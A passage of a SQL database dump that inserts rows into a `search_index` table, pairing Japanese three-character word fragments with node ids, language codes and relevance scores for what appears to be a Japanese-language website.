('へ出発', 68, 'ja', 'node_search', 1),
('へ出発', 73, 'ja', 'node_search', 1),
('へ出発', 78, 'ja', 'node_search', 1),
('へ出発', 111, 'ja', 'node_search', 1),
('へ出発', 154, 'ja', 'node_search', 1.78178),
('へ出発', 156, 'ja', 'node_search', 27.9384),
('へ出発', 157, 'ja', 'node_search', 27.8335),
('へ出発', 164, 'ja', 'node_search', 1.75231),
('へ出発', 165, 'ja', 'node_search', 1.74996),
('へ出発', 167, 'ja', 'node_search', 1.81645),
('へ出発', 169, 'ja', 'node_search', 1.78691),
('へ出発', 171, 'ja', 'node_search', 1.77419),
('へ出発', 173, 'ja', 'node_search', 1.76188),
('へ出発', 174, 'ja', 'node_search', 1.7185),
('へ出発', 175, 'ja', 'node_search', 1.76431),
('へ出発', 176, 'ja', 'node_search', 1.74069),
('へ出発', 177, 'ja', 'node_search', 1.71),
('へ出発', 184, 'ja', 'node_search', 1.75707),
('へ向け', 156, 'ja', 'node_search', 1),
('へ向け', 157, 'ja', 'node_search', 1),
('へ進ま', 185, 'ja', 'node_search', 1),
('べきこ', 87, 'ja', 'node_search', 1),
('べきこ', 98, 'ja', 'node_search', 1),
('べきで', 3, 'ja', 'node_search', 43),
('べき金', 8, 'ja', 'node_search', 2),
('べてが', 69, 'ja', 'node_search', 1),
('べての', 122, 'ja', 'node_search', 1),
('べての', 136, 'ja', 'node_search', 0.972861),
('べての', 140, 'ja', 'node_search', 1),
('まいり', 154, 'ja', 'node_search', 0.792123),
('まいり', 160, 'ja', 'node_search', 0.754681),
('まいり', 161, 'ja', 'node_search', 0.810915),
('まいり', 164, 'ja', 'node_search', 0.757065),
('まいり', 165, 'ja', 'node_search', 0.754681),
('まいり', 167, 'ja', 'node_search', 0.822065),
('まいり', 173, 'ja', 'node_search', 0.766757),
('まいり', 174, 'ja', 'node_search', 0.727213),
('まいり', 175, 'ja', 'node_search', 0.774192),
('まいり', 176, 'ja', 'node_search', 0.745294),
('まいり', 179, 'ja', 'node_search', 0.810915),
('まいり', 186, 'ja', 'node_search', 0.842342),
('まくい', 69, 'ja', 'node_search', 1),
('まざま', 27, 'ja', 'node_search', 0.363893),
('まざま', 183, 'ja', 'node_search', 0.938382),
('ました', 1, 'ja', 'node_search', 1),
('ました', 3, 'ja', 'node_search', 1.1529),
('ました', 9, 'ja', 'node_search', 3),
('ました', 17, 'ja', 'node_search', 4),
('ました', 19, 'ja', 'node_search', 3),
('ました', 23, 'ja', 'node_search', 3.57352),
('ました', 24, 'ja', 'node_search', 0.448322),
('ました', 27, 'ja', 'node_search', 1.95024),
('ました', 28, 'ja', 'node_search', 3),
('ました', 29, 'ja', 'node_search', 3),
('ました', 68, 'ja', 'node_search', 1),
('ました', 80, 'ja', 'node_search', 1),
('ました', 81, 'ja', 'node_search', 1),
('ました', 100, 'ja', 'node_search', 1),
('ました', 107, 'ja', 'node_search', 1),
('ました', 109, 'ja', 'node_search', 1),
('ました', 112, 'ja', 'node_search', 1),
('ました', 114, 'ja', 'node_search', 1),
('ました', 115, 'ja', 'node_search', 1),
('ました', 117, 'ja', 'node_search', 1),
('ました', 120, 'ja', 'node_search', 1),
('ました', 121, 'ja', 'node_search', 1),
('ました', 122, 'ja', 'node_search', 1.89608),
('ました', 123, 'ja', 'node_search', 1),
('ました', 125, 'ja', 'node_search', 1),
('ました', 131, 'ja', 'node_search', 1),
('ました', 132, 'ja', 'node_search', 1),
('ました', 133, 'ja', 'node_search', 1.91323),
('ました', 134, 'ja', 'node_search', 1),
('ました', 137, 'ja', 'node_search', 1),
('ました', 139, 'ja', 'node_search', 1),
('ました', 141, 'ja', 'node_search', 1),
('ました', 142, 'ja', 'node_search', 1),
('ました', 143, 'ja', 'node_search', 1),
('ました', 144, 'ja', 'node_search', 1),
('ました', 147, 'ja', 'node_search', 1),
('ました', 154, 'ja', 'node_search', 0.774192),
('ました', 156, 'ja', 'node_search', 28.9384),
('ました', 157, 'ja', 'node_search', 3.83353),
('ました', 160, 'ja', 'node_search', 1.71984),
('ました', 161, 'ja', 'node_search', 0.745294),
('ました', 164, 'ja', 'node_search', 0.747619),
('ました', 165, 'ja', 'node_search', 0.745294),
('ました', 166, 'ja', 'node_search', 0.766757),
('ました', 167, 'ja', 'node_search', 0.813674),
('ました', 168, 'ja', 'node_search', 1.73961),
('ました', 169, 'ja', 'node_search', 0.784336),
('ました', 170, 'ja', 'node_search', 1.738),
('ました', 171, 'ja', 'node_search', 0.769219),
('ました', 173, 'ja', 'node_search', 0.759465),
('ました', 174, 'ja', 'node_search', 0.716357),
('ました', 175, 'ja', 'node_search', 1.76431),
('ました', 176, 'ja', 'node_search', 0.738408),
('ました', 177, 'ja', 'node_search', 1.56439),
('ました', 178, 'ja', 'node_search', 2.73779),
('ました', 179, 'ja', 'node_search', 1.73165),
('ました', 180, 'ja', 'node_search', 1.7974),
('ました', 181, 'ja', 'node_search', 1.78178),
('ました', 182, 'ja', 'node_search', 1.79212),
('ました', 183, 'ja', 'node_search', 1.73165),
('ました', 184, 'ja', 'node_search', 1.75707),
('ました', 185, 'ja', 'node_search', 1.74996),
('ました', 186, 'ja', 'node_search', 0.766757),
('ました', 187, 'ja', 'node_search', 2.68801),
('ました', 188, 'ja', 'node_search', 0.757065),
('ました', 189, 'ja', 'node_search', 1.60895),
('ました', 190, 'ja', 'node_search', 1.68949),
('ました', 191, 'ja', 'node_search', 0.802752),
('ました', 192, 'ja', 'node_search', 0.774192),
('ました', 193, 'ja', 'node_search', 1.79212),
('ました', 194, 'ja', 'node_search', 2.64504),
('ました', 195, 'ja', 'node_search', 0.802752),
('ました', 196, 'ja', 'node_search', 1.79212),
('ました', 197, 'ja', 'node_search', 1.65041),
('ました', 198, 'ja', 'node_search', 1.77923),
('ました', 199, 'ja', 'node_search', 1.75231),
('ましと', 120, 'ja', 'node_search', 1),
('ましょ', 62, 'ja', 'node_search', 1.47543),
('ましょ', 87, 'ja', 'node_search', 6.08754),
('ますの', 69, 'ja', 'node_search', 0.931053),
('ますま', 183, 'ja', 'node_search', 0.819249),
('ますよ', 69, 'ja', 'node_search', 1),
('ます活', 183, 'ja', 'node_search', 0.813674),
('ません', 3, 'ja', 'node_search', 1.83938),
('ません', 5, 'ja', 'node_search', 1.65862),
('ません', 18, 'ja', 'node_search', 0.899454),
('ません', 98, 'ja', 'node_search', 1),
('または', 10, 'ja', 'node_search', 1),
('または', 18, 'ja', 'node_search', 28),
('までお', 162, 'ja', 'node_search', 0.628375),
('までに', 23, 'ja', 'node_search', 0.769219),
('までの', 171, 'ja', 'node_search', 0.96498),
('までの', 174, 'ja', 'node_search', 1),
('までの', 175, 'ja', 'node_search', 1),
('までの', 176, 'ja', 'node_search', 1),
('までの', 177, 'ja', 'node_search', 0.961087),
('までの', 178, 'ja', 'node_search', 1),
('までの', 187, 'ja', 'node_search', 1),
('までは', 142, 'ja', 'node_search', 1),
('まで可', 163, 'ja', 'node_search', 0.816452),
('まで幅', 133, 'ja', 'node_search', 1),
('まで積', 184, 'ja', 'node_search', 0.997306),
('まで継', 179, 'ja', 'node_search', 0.845322),
('まで継', 182, 'ja', 'node_search', 1),
('まとめ', 62, 'ja', 'node_search', 0.559882),
('まな可', 183, 'ja', 'node_search', 0.931053),
('まな郡', 27, 'ja', 'node_search', 0.362823),
('まらず', 197, 'ja', 'node_search', 1),
('まりま', 140, 'ja', 'node_search', 1),
('まりま', 142, 'ja', 'node_search', 1),
('まりま', 175, 'ja', 'node_search', 0.949597),
('まれる', 174, 'ja', 'node_search', 0.805455),
('まれる', 185, 'ja', 'node_search', 0.993146),
('みいた', 1, 'ja', 'node_search', 1),
('みなが', 175, 'ja', 'node_search', 0.916736),
('みなが', 176, 'ja', 'node_search', 0.945829),
('みなが', 177, 'ja', 'node_search', 0.830633),
('みなが', 184, 'ja', 'node_search', 0.842342),
('みなが', 190, 'ja', 'node_search', 0.851346),
('みなが', 197, 'ja', 'node_search', 0.854391),
('みの日', 29, 'ja', 'node_search', 3),
('みます', 135, 'ja', 'node_search', 0.854391),
('みんな', 62, 'ja', 'node_search', 0.600219),
('み出さ', 175, 'ja', 'node_search', 1),
('み出さ', 177, 'ja', 'node_search', 0.866793),
('み出さ', 184, 'ja', 'node_search', 0.882818),
('み出さ', 190, 'ja', 'node_search', 0.934703),
('み出し', 25, 'ja', 'node_search', 1),
('み出し', 26, 'ja', 'node_search', 1),
('み重ね', 179, 'ja', 'node_search', 0.993146),
('み重ね', 182, 'ja', 'node_search', 1),
('み重ね', 184, 'ja', 'node_search', 0.98493),
('み重ね', 190, 'ja', 'node_search', 1),
('み重ね', 191, 'ja', 'node_search', 1),
('み重ね', 199, 'ja', 'node_search', 0.96498),
('むこと', 136, 'ja', 'node_search', 1.59351),
('むため', 95, 'ja', 'node_search', 19),
('むため', 194, 'ja', 'node_search', 1),
('むサビ', 24, 'ja', 'node_search', 0.494765),
('めた月', 163, 'ja', 'node_search', 0.833529),
('めてい', 18, 'ja', 'node_search', 3),
('めてい', 30, 'ja', 'node_search', 3),
('めてい', 142, 'ja', 'node_search', 1),
('めてか', 3, 'ja', 'node_search', 0.617112),
('めてく', 87, 'ja', 'node_search', 1),
('めての', 9, 'ja', 'node_search', 3),
('めての', 17, 'ja', 'node_search', 4),
('めてま', 161, 'ja', 'node_search', 0.816452),
('めです', 155, 'ja', 'node_search', 0.759465),
('めでと', 68, 'ja', 'node_search', 23),
('めでと', 69, 'ja', 'node_search', 1),
('めでと', 70, 'ja', 'node_search', 20),
('めでと', 71, 'ja', 'node_search', 2),
('めでと', 72, 'ja', 'node_search', 20),
('めでと', 73, 'ja', 'node_search', 20),
('めでと', 74, 'ja', 'node_search', 20),
('めでと', 75, 'ja', 'node_search', 47),
('めでと', 76, 'ja', 'node_search', 20),
('めでと', 77, 'ja', 'node_search', 26),
('めでと', 78, 'ja', 'node_search', 23),
('めでと', 80, 'ja', 'node_search', 25.9892),
('めでと', 81, 'ja', 'node_search', 23),
('めでと', 82, 'ja', 'node_search', 47),
('めでと', 83, 'ja', 'node_search', 20),
('めでと', 84, 'ja', 'node_search', 47),
('めでと', 85, 'ja', 'node_search', 26),
('めでと', 86, 'ja', 'node_search', 2),
('めでと', 88, 'ja', 'node_search', 2),
('めでと', 89, 'ja', 'node_search', 20),
('めでと', 90, 'ja', 'node_search', 47),
('めでと', 91, 'ja', 'node_search', 20),
('めでと', 92, 'ja', 'node_search', 20),
('めでと', 93, 'en', 'node_search', 29),
('めでと', 93, 'ja', 'node_search', 20),
('めでと', 96, 'ja', 'node_search', 20),
('めでと', 97, 'ja', 'node_search', 20),
('めでと', 99, 'ja', 'node_search', 20),
('めでと', 100, 'ja', 'node_search', 23),
('めでと', 101, 'ja', 'node_search', 23),
('めでと', 102, 'ja', 'node_search', 23),
('めでと', 103, 'ja', 'node_search', 20),
('めでと', 104, 'ja', 'node_search', 29),
('めでと', 105, 'ja', 'node_search', 20),
('めでと', 106, 'ja', 'node_search', 20),
('めでと', 107, 'ja', 'node_search', 20),
('めでと', 108, 'ja', 'node_search', 20),
('めでと', 109, 'ja', 'node_search', 23),
('めでと', 110, 'ja', 'node_search', 20),
('めでと', 111, 'ja', 'node_search', 19),
('めでと', 112, 'ja', 'node_search', 20),
('めでと', 113, 'ja', 'node_search', 20),
('めでと', 114, 'ja', 'node_search', 20),
('めでと', 115, 'ja', 'node_search', 20),
('めでと', 117, 'ja', 'node_search', 20),
('めでと', 118, 'ja', 'node_search', 20),
('めでと', 119, 'ja', 'node_search', 20),
('めでと', 121, 'ja', 'node_search', 20),
('めでと', 123, 'ja', 'node_search', 20),
('めでと', 124, 'ja', 'node_search', 20),
('めでと', 125, 'ja', 'node_search', 20),
('めでと', 127, 'ja', 'node_search', 19),
('めでと', 128, 'ja', 'node_search', 19),
('めでと', 129, 'ja', 'node_search', 19),
('めでと', 130, 'ja', 'node_search', 19),
('めでと', 131, 'ja', 'node_search', 20),
('めでと', 132, 'ja', 'node_search', 20),
('めでと', 134, 'ja', 'node_search', 20),
('めでと', 137, 'ja', 'node_search', 20),
('めでと', 139, 'ja', 'node_search', 20),
('めでと', 140, 'ja', 'node_search', 1),
('めでと', 141, 'ja', 'node_search', 20),
('めでと', 143, 'ja', 'node_search', 20),
('めでと', 144, 'ja', 'node_search', 20),
('めでと', 145, 'ja', 'node_search', 20),
('めでと', 146, 'ja', 'node_search', 20),
('めでと', 147, 'ja', 'node_search', 20),
('めでと', 148, 'ja', 'node_search', 20),
('めでと', 151, 'ja', 'node_search', 20),
('めでと', 152, 'en', 'node_search', 20),
('めでと', 152, 'ja', 'node_search', 20),
('めでと', 153, 'ja', 'node_search', 20),
('めでと', 161, 'ja', 'node_search', 0.802752),
('めでと', 166, 'ja', 'node_search', 0.78951),
('めでと', 168, 'ja', 'node_search', 0.776703),
('めでと', 170, 'ja', 'node_search', 0.76188),
('めでと', 181, 'ja', 'node_search', 4),
('めでと', 182, 'ja', 'node_search', 0.833529),
('めでと', 183, 'ja', 'node_search', 0.766757),
('めでと', 187, 'ja', 'node_search', 0.754681),
('めでと', 190, 'ja', 'node_search', 0.786915),
('めでと', 194, 'ja', 'node_search', 0.769219),
('めでと', 197, 'ja', 'node_search', 0.786915),
('めない', 98, 'ja', 'node_search', 1);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('めにお', 163, 'ja', 'node_search', 0.630018),
('めにこ', 1, 'ja', 'node_search', 0.949597),
('めにこ', 136, 'ja', 'node_search', 0.676032),
('めには', 6, 'ja', 'node_search', 3),
('めにも', 24, 'ja', 'node_search', 0.558589),
('めにヤ', 95, 'ja', 'node_search', 19),
('めに一', 87, 'ja', 'node_search', 0.617112),
('めに十', 98, 'ja', 'node_search', 1),
('めに寝', 87, 'ja', 'node_search', 0.810915),
('めに必', 6, 'ja', 'node_search', 3),
('めに登', 28, 'ja', 'node_search', 3),
('めのも', 3, 'ja', 'node_search', 0.691597),
('めの大', 178, 'ja', 'node_search', 1),
('めの大', 187, 'ja', 'node_search', 1),
('めの大', 192, 'ja', 'node_search', 0.96498),
('めの大', 194, 'ja', 'node_search', 1),
('めの実', 136, 'ja', 'node_search', 0.866793),
('めの授', 24, 'ja', 'node_search', 0.405257),
('めの支', 23, 'ja', 'node_search', 0.44024),
('めの日', 24, 'ja', 'node_search', 0.392932),
('めの特', 7, 'ja', 'node_search', 3.8861),
('めまし', 122, 'ja', 'node_search', 0.899454),
('められ', 189, 'ja', 'node_search', 0.976851),
('めるこ', 62, 'ja', 'node_search', 0.528135),
('めるよ', 135, 'ja', 'node_search', 1),
('める学', 24, 'ja', 'node_search', 0.813674),
('める際', 24, 'ja', 'node_search', 1),
('め漢字', 62, 'ja', 'node_search', 0.557303),
('もあり', 3, 'ja', 'node_search', 0.559882),
('もあり', 182, 'ja', 'node_search', 0.916736),
('もあり', 183, 'ja', 'node_search', 0.886095),
('もあり', 196, 'ja', 'node_search', 0.896076),
('もう十', 87, 'ja', 'node_search', 0.738408),
('もが評', 120, 'ja', 'node_search', 1),
('もきち', 23, 'ja', 'node_search', 0.810915),
('もさら', 182, 'ja', 'node_search', 0.899454),
('もさら', 183, 'ja', 'node_search', 0.869951),
('もし韓', 3, 'ja', 'node_search', 0.528135),
('もたち', 126, 'ja', 'node_search', 1),
('もなく', 135, 'ja', 'node_search', 1),
('もにあ', 69, 'ja', 'node_search', 0.972861),
('もので', 3, 'ja', 'node_search', 0.687638),
('もので', 179, 'ja', 'node_search', 0.968904),
('もので', 199, 'ja', 'node_search', 0.923838),
('ものと', 164, 'ja', 'node_search', 0.876337),
('ものと', 165, 'ja', 'node_search', 0.836446),
('ものと', 166, 'ja', 'node_search', 0.824901),
('ものと', 171, 'ja', 'node_search', 0.876337),
('ものと', 174, 'ja', 'node_search', 0.854391),
('ものと', 178, 'ja', 'node_search', 0.879565),
('ものと', 185, 'ja', 'node_search', 0.776703),
('ものと', 187, 'ja', 'node_search', 0.802752),
('ものと', 189, 'ja', 'node_search', 0.779231),
('ものと', 199, 'ja', 'node_search', 0.784336),
('もコミ', 24, 'ja', 'node_search', 0.416977),
('もサポ', 23, 'ja', 'node_search', 0.520204),
('もミャ', 154, 'ja', 'node_search', 0.842342),
('もミャ', 160, 'ja', 'node_search', 0.827757),
('もミャ', 161, 'ja', 'node_search', 0.873132),
('もミャ', 164, 'ja', 'node_search', 0.802752),
('もミャ', 165, 'ja', 'node_search', 0.800068),
('もミャ', 167, 'ja', 'node_search', 0.876337),
('もミャ', 173, 'ja', 'node_search', 0.813674),
('もミャ', 174, 'ja', 'node_search', 0.769219),
('もミャ', 175, 'ja', 'node_search', 0.822065),
('もミャ', 176, 'ja', 'node_search', 0.78951),
('もミャ', 179, 'ja', 'node_search', 0.953396),
('も一生', 87, 'ja', 'node_search', 1),
('も不思', 3, 'ja', 'node_search', 0.742984),
('も包括', 136, 'ja', 'node_search', 1),
('も卓越', 116, 'ja', 'node_search', 1),
('も学ぶ', 122, 'ja', 'node_search', 1),
('も学ぶ', 155, 'ja', 'node_search', 0.96498),
('も授業', 24, 'ja', 'node_search', 0.759465),
('も政府', 23, 'ja', 'node_search', 0.699655),
('も果た', 80, 'ja', 'node_search', 1),
('も自分', 87, 'ja', 'node_search', 0.652202),
('も英語', 24, 'ja', 'node_search', 0.556022),
('も行っ', 24, 'ja', 'node_search', 0.341754),
('も身に', 138, 'ja', 'node_search', 0.916736),
('も開い', 24, 'ja', 'node_search', 0.934703),
('も頑張', 69, 'ja', 'node_search', 1),
('やお手', 1, 'ja', 'node_search', 1),
('やって', 19, 'ja', 'node_search', 1),
('やりが', 188, 'ja', 'node_search', 0.949597),
('やりや', 189, 'ja', 'node_search', 1),
('やりを', 162, 'ja', 'node_search', 0.668514),
('やキッ', 135, 'ja', 'node_search', 1),
('やサー', 7, 'ja', 'node_search', 1.8861),
('やスキ', 198, 'ja', 'node_search', 0.96498),
('やマナ', 155, 'ja', 'node_search', 0.997306),
('や伝統', 122, 'ja', 'node_search', 1),
('や候補', 25, 'ja', 'node_search', 1),
('や実際', 155, 'ja', 'node_search', 1),
('や専門', 7, 'ja', 'node_search', 1.8861),
('や就職', 181, 'ja', 'node_search', 0.938382),
('や就職', 182, 'ja', 'node_search', 0.972861),
('や就職', 183, 'ja', 'node_search', 0.972861),
('や成長', 187, 'ja', 'node_search', 0.916736),
('や技術', 190, 'ja', 'node_search', 1),
('や技術', 193, 'ja', 'node_search', 0.96498),
('や技術', 195, 'ja', 'node_search', 1),
('や文化', 87, 'ja', 'node_search', 1),
('や日本', 186, 'ja', 'node_search', 0.902857),
('や機会', 1, 'ja', 'node_search', 1),
('や準備', 176, 'ja', 'node_search', 1),
('や準備', 191, 'ja', 'node_search', 1),
('や生活', 8, 'ja', 'node_search', 2),
('や研修', 23, 'ja', 'node_search', 0.448322),
('や筆記', 138, 'ja', 'node_search', 1),
('や肉の', 133, 'ja', 'node_search', 1),
('や責任', 189, 'ja', 'node_search', 1),
('や車椅', 162, 'ja', 'node_search', 0.76431),
('や面接', 173, 'ja', 'node_search', 1),
('や面接', 184, 'ja', 'node_search', 1),
('や韓国', 3, 'ja', 'node_search', 0.830633),
('ようこ', 1, 'ja', 'node_search', 26),
('ような', 87, 'ja', 'node_search', 0.591395),
('ような', 155, 'ja', 'node_search', 0.779231),
('ような', 156, 'ja', 'node_search', 1),
('ような', 157, 'ja', 'node_search', 0.957226),
('ような', 189, 'ja', 'node_search', 0.942091),
('ように', 23, 'ja', 'node_search', 0.473576),
('ように', 24, 'ja', 'node_search', 0.519091),
('ように', 26, 'ja', 'node_search', 1),
('ように', 69, 'ja', 'node_search', 1),
('ように', 77, 'ja', 'node_search', 4),
('ように', 87, 'ja', 'node_search', 1.63668),
('ように', 135, 'ja', 'node_search', 1),
('ように', 140, 'ja', 'node_search', 0.879565),
('よく聞', 87, 'ja', 'node_search', 0.976851),
('よって', 9, 'ja', 'node_search', 3),
('よって', 17, 'ja', 'node_search', 4),
('よって', 190, 'ja', 'node_search', 1),
('よって', 199, 'ja', 'node_search', 0.949597),
('よび介', 162, 'ja', 'node_search', 0.779231),
('よび収', 163, 'ja', 'node_search', 0.931053),
('よび政', 27, 'ja', 'node_search', 0.387358),
('よび民', 27, 'ja', 'node_search', 1.15049),
('よび特', 162, 'ja', 'node_search', 1),
('よりお', 154, 'ja', 'node_search', 1),
('よりお', 155, 'ja', 'node_search', 0.657549),
('よりお', 156, 'ja', 'node_search', 0.989021),
('よりお', 157, 'ja', 'node_search', 0.869951),
('よりお', 160, 'ja', 'node_search', 0.931053),
('よりお', 161, 'ja', 'node_search', 0.989021),
('よりお', 164, 'ja', 'node_search', 0.961087),
('よりお', 165, 'ja', 'node_search', 0.902857),
('よりお', 166, 'ja', 'node_search', 0.972861),
('よりお', 168, 'ja', 'node_search', 0.976851),
('よりお', 170, 'ja', 'node_search', 0.989021),
('よりお', 179, 'ja', 'node_search', 0.800068),
('よりお', 180, 'ja', 'node_search', 0.886095),
('よりお', 181, 'ja', 'node_search', 0.889397),
('よりお', 185, 'ja', 'node_search', 0.842342),
('よりお', 186, 'ja', 'node_search', 0.830633),
('よりお', 188, 'ja', 'node_search', 0.839384),
('よりお', 189, 'ja', 'node_search', 0.857458),
('よりお', 191, 'ja', 'node_search', 0.896076),
('よりお', 192, 'ja', 'node_search', 0.857458),
('よりお', 193, 'ja', 'node_search', 0.876337),
('よりお', 195, 'ja', 'node_search', 0.899454),
('よりお', 196, 'ja', 'node_search', 0.882818),
('よりお', 198, 'ja', 'node_search', 0.857458),
('よりお', 199, 'ja', 'node_search', 0.857458),
('より広', 183, 'ja', 'node_search', 27),
('より期', 182, 'ja', 'node_search', 0.857458),
('より期', 183, 'ja', 'node_search', 0.786915),
('より期', 197, 'ja', 'node_search', 0.819249),
('より直', 27, 'ja', 'node_search', 0.320973),
('より良', 111, 'ja', 'node_search', 1),
('より願', 167, 'ja', 'node_search', 0.906287),
('より願', 169, 'ja', 'node_search', 0.879565),
('より願', 171, 'ja', 'node_search', 0.857458),
('より願', 173, 'ja', 'node_search', 0.845322),
('より願', 174, 'ja', 'node_search', 0.78951),
('より願', 175, 'ja', 'node_search', 0.851346),
('より願', 176, 'ja', 'node_search', 0.902857),
('より願', 177, 'ja', 'node_search', 0.781775),
('より願', 178, 'ja', 'node_search', 0.854391),
('より願', 184, 'ja', 'node_search', 0.779231),
('より願', 187, 'ja', 'node_search', 0.781775),
('より願', 190, 'ja', 'node_search', 0.816452),
('より願', 194, 'ja', 'node_search', 0.797402),
('よるも', 179, 'ja', 'node_search', 0.976851),
('よる実', 142, 'ja', 'node_search', 0.740689),
('らご活', 190, 'ja', 'node_search', 0.842342),
('らしい', 116, 'ja', 'node_search', 1),
('らしい', 154, 'ja', 'node_search', 0.913226),
('らしい', 156, 'ja', 'node_search', 1),
('らしい', 157, 'ja', 'node_search', 0.938382),
('らしい', 160, 'ja', 'node_search', 0.957226),
('らしい', 164, 'ja', 'node_search', 0.98493),
('らしい', 166, 'ja', 'node_search', 1),
('らしい', 168, 'ja', 'node_search', 0.857458),
('らしい', 170, 'ja', 'node_search', 0.866793),
('らしい', 171, 'ja', 'node_search', 0.993146),
('らしい', 174, 'ja', 'node_search', 0.824901),
('らしい', 177, 'ja', 'node_search', 0.989021),
('らしい', 178, 'ja', 'node_search', 0.997306),
('らしい', 181, 'ja', 'node_search', 1),
('らしい', 182, 'ja', 'node_search', 1),
('らしい', 183, 'ja', 'node_search', 1),
('らしい', 194, 'ja', 'node_search', 0.927431),
('らしい', 195, 'ja', 'node_search', 0.923838),
('らしい', 197, 'ja', 'node_search', 0.920273),
('らしい', 198, 'ja', 'node_search', 0.879565),
('らしい', 199, 'ja', 'node_search', 0.792123),
('らしさ', 23, 'ja', 'node_search', 0.504001),
('らしま', 87, 'ja', 'node_search', 0.740689),
('らせい', 161, 'ja', 'node_search', 1),
('らせい', 166, 'ja', 'node_search', 1),
('らせい', 168, 'ja', 'node_search', 1),
('らせい', 170, 'ja', 'node_search', 1),
('らせい', 178, 'ja', 'node_search', 1),
('らせい', 180, 'ja', 'node_search', 1),
('らせい', 181, 'ja', 'node_search', 1),
('らせい', 182, 'ja', 'node_search', 1),
('らせい', 183, 'ja', 'node_search', 1),
('らせい', 185, 'ja', 'node_search', 1),
('らせい', 186, 'ja', 'node_search', 1),
('らせい', 187, 'ja', 'node_search', 1),
('らせい', 188, 'ja', 'node_search', 1),
('らせい', 189, 'ja', 'node_search', 1),
('らせい', 190, 'ja', 'node_search', 1),
('らせい', 191, 'ja', 'node_search', 1),
('らせい', 192, 'ja', 'node_search', 1),
('らせい', 193, 'ja', 'node_search', 1),
('らせい', 194, 'ja', 'node_search', 1),
('らせい', 195, 'ja', 'node_search', 1),
('らせい', 196, 'ja', 'node_search', 1),
('らせい', 197, 'ja', 'node_search', 1),
('らせい', 198, 'ja', 'node_search', 1),
('らせい', 199, 'ja', 'node_search', 1),
('らです', 3, 'ja', 'node_search', 0.934703),
('らなる', 69, 'ja', 'node_search', 1),
('らなる', 95, 'ja', 'node_search', 19),
('らなる', 113, 'ja', 'node_search', 1),
('らなる', 161, 'ja', 'node_search', 0.776703),
('らなる', 171, 'ja', 'node_search', 0.813674),
('らなる', 178, 'ja', 'node_search', 0.819249),
('らなる', 180, 'ja', 'node_search', 0.824901),
('らなる', 181, 'ja', 'node_search', 0.839384),
('らなる', 182, 'ja', 'node_search', 0.892724),
('らなる', 183, 'ja', 'node_search', 0.863659),
('らなる', 186, 'ja', 'node_search', 0.794753),
('らなる', 192, 'ja', 'node_search', 0.920273),
('らなる', 193, 'ja', 'node_search', 0.938382),
('らなる', 196, 'ja', 'node_search', 0.822065),
('らなる', 199, 'ja', 'node_search', 0.902857),
('らに成', 195, 'ja', 'node_search', 1),
('らに詳', 1, 'ja', 'node_search', 1),
('らのお', 24, 'ja', 'node_search', 0.446681),
('らのリ', 120, 'ja', 'node_search', 1),
('らの初', 9, 'ja', 'node_search', 3),
('らの初', 17, 'ja', 'node_search', 4),
('らの手', 136, 'ja', 'node_search', 0.668514),
('らは秋', 150, 'ja', 'node_search', 1),
('らもミ', 160, 'ja', 'node_search', 0.830633),
('らもミ', 161, 'ja', 'node_search', 0.876337),
('らもミ', 164, 'ja', 'node_search', 0.805455),
('らもミ', 173, 'ja', 'node_search', 0.816452),
('らもミ', 175, 'ja', 'node_search', 0.824901),
('らもミ', 176, 'ja', 'node_search', 0.792123),
('られて', 7, 'ja', 'node_search', 1.8861),
('られな', 3, 'ja', 'node_search', 0.577261),
('られま', 19, 'ja', 'node_search', 2),
('られま', 184, 'ja', 'node_search', 1),
('られま', 189, 'ja', 'node_search', 0.972861),
('られる', 7, 'ja', 'node_search', 1.8861),
('られる', 29, 'ja', 'node_search', 3),
('られる', 120, 'ja', 'node_search', 0.934703),
('られる', 169, 'ja', 'node_search', 0.899454),
('られる', 175, 'ja', 'node_search', 0.869951),
('られる', 177, 'ja', 'node_search', 0.792123),
('られる', 184, 'ja', 'node_search', 0.794753),
('られる', 194, 'ja', 'node_search', 0.813674),
('ら午後', 5, 'ja', 'node_search', 1),
('ら午後', 62, 'ja', 'node_search', 1.18091),
('ら午後', 163, 'ja', 'node_search', 0.797402),
('ら厨房', 133, 'ja', 'node_search', 1),
('ら多く', 27, 'ja', 'node_search', 0.414858),
('ら差し', 8, 'ja', 'node_search', 2),
('ら常に', 25, 'ja', 'node_search', 1),
('ら感謝', 133, 'ja', 'node_search', 0.802752),
('ら成長', 175, 'ja', 'node_search', 0.906287),
('ら成長', 176, 'ja', 'node_search', 0.934703),
('ら成長', 177, 'ja', 'node_search', 0.822065),
('ら成長', 184, 'ja', 'node_search', 0.833529),
('ら成長', 197, 'ja', 'node_search', 0.845322),
('ら指導', 138, 'ja', 'node_search', 1),
('ら日曜', 142, 'ja', 'node_search', 1),
('ら日本', 24, 'ja', 'node_search', 0.400625),
('ら日本', 69, 'ja', 'node_search', 1),
('ら木曜', 142, 'ja', 'node_search', 1),
('ら来た', 23, 'ja', 'node_search', 0.628375),
('ら民族', 24, 'ja', 'node_search', 1),
('ら渡日', 179, 'ja', 'node_search', 0.857458),
('ら直接', 23, 'ja', 'node_search', 0.857458),
('ら直輸', 27, 'ja', 'node_search', 0.30191),
('ら移行', 7, 'ja', 'node_search', 1.78555),
('ら許可', 23, 'ja', 'node_search', 0.691597),
('りいた', 160, 'ja', 'node_search', 0.842342),
('りいた', 161, 'ja', 'node_search', 0.889397),
('りいた', 166, 'ja', 'node_search', 0.869951),
('りいた', 168, 'ja', 'node_search', 0.873132),
('りいた', 170, 'ja', 'node_search', 0.882818),
('りいた', 179, 'ja', 'node_search', 0.738408),
('りいた', 180, 'ja', 'node_search', 0.802752),
('りいた', 181, 'ja', 'node_search', 0.805455),
('りいた', 186, 'ja', 'node_search', 0.771698),
('りいた', 188, 'ja', 'node_search', 0.76431),
('りいた', 191, 'ja', 'node_search', 0.810915),
('りいた', 192, 'ja', 'node_search', 0.781775),
('りいた', 193, 'ja', 'node_search', 0.797402),
('りいた', 196, 'ja', 'node_search', 0.800068),
('りいた', 198, 'ja', 'node_search', 0.784336),
('りお気', 155, 'ja', 'node_search', 0.655756),
('りお祈', 156, 'ja', 'node_search', 0.98493),
('りお祈', 157, 'ja', 'node_search', 0.866793),
('りお祝', 154, 'ja', 'node_search', 1),
('りお祝', 160, 'ja', 'node_search', 0.927431),
('りお祝', 161, 'ja', 'node_search', 0.98493),
('りお祝', 164, 'ja', 'node_search', 0.957226),
('りお祝', 165, 'ja', 'node_search', 0.899454),
('りお祝', 166, 'ja', 'node_search', 0.968904),
('りお祝', 168, 'ja', 'node_search', 0.972861),
('りお祝', 170, 'ja', 'node_search', 0.98493),
